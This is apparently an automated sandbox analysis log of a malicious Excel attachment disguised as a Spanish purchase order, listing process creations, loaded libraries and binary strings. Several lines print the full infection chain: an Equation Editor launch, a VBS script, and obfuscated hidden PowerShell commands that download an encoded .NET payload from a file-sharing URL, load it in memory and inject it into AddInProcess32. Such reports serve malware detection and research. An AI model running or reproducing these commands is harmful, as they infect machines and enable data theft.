                      Source: Orden de Compra No. 78986756565344657.xlam.xlsxReversingLabs: Detection: 71%
                      Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wednesdaydatinglover.vbs"
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBTaG9NZVs0XSskUFNob21FWzM0XSsneCcpICggKCgndnpnaW1hZ2VVcmwgPSB3anNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VWhCWXd1ciB3anM7dnpnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt2emdpbWFnZUJ5dGVzID0nKycgdnpnd2ViQ2xpZW50LkRvJysnd25sb2FkJysnRGF0YSh2emcnKydpbWFnZVVybCk7dnpnaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcodnpnaW1hZ2VCeXRlcyk7dnpnc3RhcnRGbGFnID0gd2pzPDxCQVNFNjRfU1RBUlQ+Pndqczt2emdlbicrJ2RGbGFnID0gd2pzPDxCQVNFNjRfRU5EPj53anM7dnpnc3RhJysncnRJbicrJ2RleCA9IHZ6Z2ltYWdlVGV4dC5JbmRleE9mKHZ6Z3N0YXJ0RmxhZyk7dicrJ3pnZW5kSW5kZXggJysnPSB2emdpbWFnZVRleHQuSW5kZXhPZih2emdlbmRGJysnbGEnKydnKTt2emdzdGFydEluZGV4IC1nZSAwIC1hbmQgdnpnZW5kSW5kZXggLWd0IHZ6Z3N0YXJ0SW5kZXg7dnpnc3RhcnRJbmRleCArPSAnKyd2emdzdGFydEZsYWcuTGVuZ3RoOycrJ3Z6Z2Jhc2UnKyc2NExlbmd0aCA9IHZ6Z2VuZEluZGV4IC0gdicrJ3pnc3RhcnRJbmRleDt2emdiYXNlNjRDb21tYW5kID0gdnpnaW1hZ2VUZXh0LlN1YnN0cmluZyh2emdzdGEnKydydEluZGV4LCB2emdiYXNlNjRMZW5nJysndGgpO3Z6Z2Jhc2U2NFJldmVyc2VkID0gLWpvaW4gKHZ6Z2Jhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSA3TkYgRm9yRWFjaC1PYmplY3QgeyB2emdfIH0pWy0xLi4tKHZ6Z2Jhc2U2NENvbW1hbmQuTGVuZ3RoKV07dnpnY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh2emdiYXNlNjRSZXZlcicrJ3NlZCk7dnpnbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHZ6Z2NvbW1hbmRCeXRlcyk7dnpndmEnKydpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh3anNWQUl3anMpO3Z6Z3ZhaU1ldGhvZC5JbnZva2UodnpnbnVsJysnbCwgQCh3anN0eHQudHNldGFsZGlvcmRzc3Nzc3Nzb3RpdXFlL2dyby5zbmRrY3VkLmVsaWZ5eXl5eXlhZHNlbmRldy8vOnAnKyd0dGh3anMsIHdqc2Rlc2F0aXZhZG93anMnKycsIHdqc2Rlc2F0aXZhZG93anMsIHdqc2Rlc2F0aXZhZG93anMnKycsIHdqc0FkZEluUHJvY2VzczMyd2pzLCB3anNkZXNhdGl2YWRvd2pzLCB3anNkZXNhdGl2YWRvd2pzLHdqc2Rlc2F0aXZhZG93anMsd2pzZGVzYXRpdmFkb3dqcyx3anNkZXNhdGl2YWRvd2pzLHdqc2Rlc2F0aXZhZG93anMsd2pzZGUnKydzYXRpdmFkb3dqcyx3anMxd2pzLHdqc2Rlc2F0aXZhZG93anMpKTsnKS1DcmVwbGFjRShbQ2hhUl0xMTgrW0NoYVJdMTIyK1tDaGFSXTEwMyksW0NoYVJdMzYgIC1yZVBsQUNlICAoW0NoYVJdNTUrW0NoYVJdNzgrW0NoYVJdNzApLFtDaGFSXTEyNCAtcmVQbEFDZSd3anMnLFtDaGFSXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $pShoMe[4]+$PShomE[34]+'x') ( (('vzgimageUrl = wjshttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur wjs;vzgwebClient = New-Object System.Net.WebClient;vzgimageBytes ='+' vzgwebClient.Do'+'wnload'+'Data(vzg'+'imageUrl);vzgi'+'mageText = [System.Text.Encoding]::UTF8.GetString(vzgimageBytes);vzgstartFlag = wjs<<BASE64_START>>wjs;vzgen'+'dFlag = wjs<<BASE64_END>>wjs;vzgsta'+'rtIn'+'dex = vzgimageText.IndexOf(vzgstartFlag);v'+'zgendIndex '+'= vzgimageText.IndexOf(vzgendF'+'la'+'g);vzgstartIndex -ge 0 -and vzgendIndex -gt vzgstartIndex;vzgstartIndex += '+'vzgstartFlag.Length;'+'vzgbase'+'64Length = vzgendIndex - v'+'zgstartIndex;vzgbase64Command = vzgimageText.Substring(vzgsta'+'rtIndex, vzgbase64Leng'+'th);vzgbase64Reversed = -join (vzgbase64Command.ToCharArray() 7NF ForEach-Object { vzg_ })[-1..-(vzgbase64Command.Length)];vzgcommandBytes = [System.Convert]::FromBase64String(vzgbase64Rever'+'sed);vzgloadedAssembly = [System.Reflection.Assembly]::Load(vzgcommandBytes);vzgva'+'iMethod = [dnlib.IO.Home].GetMethod(wjsVAIwjs);vzgvaiMethod.Invoke(vzgnul'+'l, @(wjstxt.tsetaldiordsssssssotiuqe/gro.sndkcud.elifyyyyyyadsendew//:p'+'tthwjs, wjsdesativadowjs'+', wjsdesativadowjs, wjsdesativadowjs'+', wjsAddInProcess32wjs, wjsdesativadowjs, wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsde'+'sativadowjs,wjs1wjs,wjsdesativadowjs));')-CreplacE([ChaR]118+[ChaR]122+[ChaR]103),[ChaR]36 -rePlACe ([ChaR]55+[ChaR]78+[ChaR]70),[ChaR]124 -rePlACe'wjs',[ChaR]39) )"
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\wednesdaydatinglover.vbs" Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJHBTaG9NZVs0XSskUFNob21FWzM0XSsneCcpICggKCgndnpnaW1hZ2VVcmwgPSB3anNodHRwczovL2RyaXZlLmdvb2dsZS5jb20vdWM/ZXhwb3J0PWRvd25sb2FkJmlkPTFBSVZnSkpKdjFGNicrJ3ZTNHNVT3libkgtc0R2VWhCWXd1ciB3anM7dnpnd2ViQ2xpZW50ID0gTmV3LU9iamVjdCBTeXN0ZW0uTmV0LldlYkNsaWVudDt2emdpbWFnZUJ5dGVzID0nKycgdnpnd2ViQ2xpZW50LkRvJysnd25sb2FkJysnRGF0YSh2emcnKydpbWFnZVVybCk7dnpnaScrJ21hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZXRTdHJpbmcodnpnaW1hZ2VCeXRlcyk7dnpnc3RhcnRGbGFnID0gd2pzPDxCQVNFNjRfU1RBUlQ+Pndqczt2emdlbicrJ2RGbGFnID0gd2pzPDxCQVNFNjRfRU5EPj53anM7dnpnc3RhJysncnRJbicrJ2RleCA9IHZ6Z2ltYWdlVGV4dC5JbmRleE9mKHZ6Z3N0YXJ0RmxhZyk7dicrJ3pnZW5kSW5kZXggJysnPSB2emdpbWFnZVRleHQuSW5kZXhPZih2emdlbmRGJysnbGEnKydnKTt2emdzdGFydEluZGV4IC1nZSAwIC1hbmQgdnpnZW5kSW5kZXggLWd0IHZ6Z3N0YXJ0SW5kZXg7dnpnc3RhcnRJbmRleCArPSAnKyd2emdzdGFydEZsYWcuTGVuZ3RoOycrJ3Z6Z2Jhc2UnKyc2NExlbmd0aCA9IHZ6Z2VuZEluZGV4IC0gdicrJ3pnc3RhcnRJbmRleDt2emdiYXNlNjRDb21tYW5kID0gdnpnaW1hZ2VUZXh0LlN1YnN0cmluZyh2emdzdGEnKydydEluZGV4LCB2emdiYXNlNjRMZW5nJysndGgpO3Z6Z2Jhc2U2NFJldmVyc2VkID0gLWpvaW4gKHZ6Z2Jhc2U2NENvbW1hbmQuVG9DaGFyQXJyYXkoKSA3TkYgRm9yRWFjaC1PYmplY3QgeyB2emdfIH0pWy0xLi4tKHZ6Z2Jhc2U2NENvbW1hbmQuTGVuZ3RoKV07dnpnY29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZyh2emdiYXNlNjRSZXZlcicrJ3NlZCk7dnpnbG9hZGVkQXNzZW1ibHkgPSBbU3lzdGVtLlJlZmxlY3Rpb24uQXNzZW1ibHldOjpMb2FkKHZ6Z2NvbW1hbmRCeXRlcyk7dnpndmEnKydpTWV0aG9kID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCh3anNWQUl3anMpO3Z6Z3ZhaU1ldGhvZC5JbnZva2UodnpnbnVsJysnbCwgQCh3anN0eHQudHNldGFsZGlvcmRzc3Nzc3Nzb3RpdXFlL2dyby5zbmRrY3VkLmVsaWZ5eXl5eXlhZHNlbmRldy8vOnAnKyd0dGh3anMsIHdqc2Rlc2F0aXZhZG93anMnKycsIHdqc2Rlc2F0aXZhZG93anMsIHdqc2Rlc2F0aXZhZG93anMnKycsIHdqc0FkZEluUHJvY2VzczMyd2pzLCB3anNkZXNhdGl2YWRvd2pzLCB3anNkZXNhdGl2YWRvd2pzLHdqc2Rlc2F0aXZhZG93anMsd2pzZGVzYXRpdmFkb3dqcyx3anNkZXNhdGl2YWRvd2pzLHdqc2Rlc2F0aXZhZG93anMsd2pzZGUnKydzYXRpdmFkb3dqcyx3anMxd2pzLHdqc2Rlc2F0aXZhZG93anMpKTsnKS1DcmVwbGFjRShbQ2hhUl0xMTgrW0NoYVJdMTIyK1tDaGFSXTEwMyksW0NoYVJdMzYgIC1yZVBsQUNlICAoW0NoYVJdNTUrW0NoYVJdNzgrW0NoYVJdNzApLFtDaGFSXTEyNCAtcmVQbEFDZSd3anMnLFtDaGFSXTM5KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $pShoMe[4]+$PShomE[34]+'x') ( (('vzgimageUrl = wjshttps://drive.google.com/uc?export=download&id=1AIVgJJJv1F6'+'vS4sUOybnH-sDvUhBYwur wjs;vzgwebClient = New-Object System.Net.WebClient;vzgimageBytes ='+' vzgwebClient.Do'+'wnload'+'Data(vzg'+'imageUrl);vzgi'+'mageText = [System.Text.Encoding]::UTF8.GetString(vzgimageBytes);vzgstartFlag = wjs<<BASE64_START>>wjs;vzgen'+'dFlag = wjs<<BASE64_END>>wjs;vzgsta'+'rtIn'+'dex = vzgimageText.IndexOf(vzgstartFlag);v'+'zgendIndex '+'= vzgimageText.IndexOf(vzgendF'+'la'+'g);vzgstartIndex -ge 0 -and vzgendIndex -gt vzgstartIndex;vzgstartIndex += '+'vzgstartFlag.Length;'+'vzgbase'+'64Length = vzgendIndex - v'+'zgstartIndex;vzgbase64Command = vzgimageText.Substring(vzgsta'+'rtIndex, vzgbase64Leng'+'th);vzgbase64Reversed = -join (vzgbase64Command.ToCharArray() 7NF ForEach-Object { vzg_ })[-1..-(vzgbase64Command.Length)];vzgcommandBytes = [System.Convert]::FromBase64String(vzgbase64Rever'+'sed);vzgloadedAssembly = [System.Reflection.Assembly]::Load(vzgcommandBytes);vzgva'+'iMethod = [dnlib.IO.Home].GetMethod(wjsVAIwjs);vzgvaiMethod.Invoke(vzgnul'+'l, @(wjstxt.tsetaldiordsssssssotiuqe/gro.sndkcud.elifyyyyyyadsendew//:p'+'tthwjs, wjsdesativadowjs'+', wjsdesativadowjs, wjsdesativadowjs'+', wjsAddInProcess32wjs, wjsdesativadowjs, wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsdesativadowjs,wjsde'+'sativadowjs,wjs1wjs,wjsdesativadowjs));')-CreplacE([ChaR]118+[ChaR]122+[ChaR]103),[ChaR]36 -rePlACe ([ChaR]55+[ChaR]78+[ChaR]70),[ChaR]124 -rePlACe'wjs',[ChaR]39) )"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64win.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: wow64cpu.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: msi.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: cryptsp.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rpcrtremote.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dwmapi.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: version.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: secur32.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winhttp.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: webio.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: winnsi.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dnsapi.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: nlaapi.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: propsys.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: ntmarta.dllJump to behavior
                      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXESection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64win.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wow64cpu.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dwmapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcrypt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rpcrtremote.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: credssp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wow64win.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wow64cpu.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: version.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: bcrypt.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: wbemcomn2.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rpcrtremote.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: ntdsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasapi32.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasman.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rtutils.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winhttp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: webio.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: credssp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: iphlpapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc6.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dhcpcsvc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeSection loaded: vaultcli.dllJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: Orden de Compra No. 78986756565344657.xlam.xlsxInitial sample: OLE zip file path = xl/calcChain.xml
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                      Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
                      Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000009.00000002.520159401.0000000000270000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000009.00000002.526178052.0000000006350000.00000004.08000000.00040000.00000000.sdmp
